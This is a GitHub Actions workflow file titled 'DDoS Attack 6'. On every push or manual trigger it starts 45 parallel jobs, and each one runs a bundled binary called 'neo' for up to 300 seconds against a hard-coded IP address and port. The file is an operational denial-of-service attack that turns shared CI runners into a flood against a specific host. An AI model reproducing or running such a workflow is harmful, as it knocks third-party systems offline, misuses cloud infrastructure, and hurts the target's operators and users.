name: DDoS Attack 6
on: [push, workflow_dispatch]

jobs:
    attack:
        runs-on: ubuntu-22.04
        strategy:
            matrix:
                count: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45]
        steps:
        - uses: actions/checkout@v3
        - run: chmod +x neo
        - run: timeout 300 ./neo 20.204.39.217 18934 180 999
